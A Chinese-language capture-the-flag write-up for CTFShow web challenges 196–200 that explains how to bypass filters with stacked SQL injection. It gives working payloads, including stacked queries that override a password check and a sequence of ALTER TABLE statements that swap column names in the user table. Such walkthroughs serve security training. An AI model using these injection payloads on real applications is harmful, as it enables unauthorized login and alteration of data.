CTFShow-web-vip/SQL注入-堆叠注入 196-200

CTFShow-web-vip/SQL 196-200

web 196 堆叠注入-字符限制

首先这里对username的要求不超过16个字符,当第一结果查询后,被堆叠注入的第二次结果覆盖掉,那么$row[0]中的密码也就是返回的堆叠注入的结果\

1
2
3
4
username:1;select(1)
password :1

)

web 197 堆叠注入-过滤

过滤了不少参数,由于我们本身知道需要查询的表是神恶魔,通过堆叠注入我们可以控制$pass[0]的结果一定会是ctfshow_user所以

1
2
username:1;show tables
password: ctfshow_user

web 198 堆叠注入-过滤

上一关的payload同样可以使用
这里看wp 有一个比较有意思的思路,师傅是使用的列名互换,本来题目的waf对象就在username中,我们将列名互换以后,直接使用
username:0
password:userAUTO
进行登录

1
0;alter table ctfshow_user change `username` `passw` varchar(100);alter table ctfshow_user change `pass` `username` varchar(100);alter table ctfshow_user change `passw` `pass` varchar(100);

web 199 堆叠注入-过滤

本题过滤括号 ,但是197 的方法仍然可用,198的方法将varchar改为longtext也行

1
0;alter table ctfshow_user change `username` `passw` longtext;alter table ctfshow_user change `pass` `username` longtext;alter table ctfshow_user change `passw` `pass` longtext;

web 200 堆叠注入-过滤

就加了个逗号限制,197 ,198 的方法均可用


优化markdown